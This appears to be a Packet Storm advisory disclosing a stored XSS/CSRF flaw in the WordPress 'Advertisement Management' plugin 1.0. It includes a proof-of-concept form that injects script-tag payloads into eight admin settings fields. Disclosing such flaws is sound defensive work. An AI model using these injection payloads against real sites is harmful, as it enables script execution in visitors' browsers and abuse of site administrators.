WordPress Advertisement Management plugin version 1.0 suffers from a cross site scripting vulnerability.
849a31ca281db757ff0047878527bbda0be3a6e822a07507b68bff90202c345eTitle: WordPress 'Advertisement Management' Plugin
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download:
- https://wordpress.org/plugins/advertisement-management/
- https://plugins.svn.wordpress.org/advertisement-management/
Notified WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
Advertisement Management lets you administrate all the blog advertisements diretctly from the blog backend.
## XSS/CSRF vulnerabilities
==========================================================
The settings on the admin page is vulnerable to XSS.
PoC:
Log in as admin and submit the this form
<form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update">
<input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br />
<input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br />
<input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br />
<input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br />
<input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br />
<input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br />
<input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br />
<input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br />
<input type="submit">
</form>
After having done this, some of the injected scripts will be executed when loading the front page of the site.
## Solution
==========================================================
No fix available
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed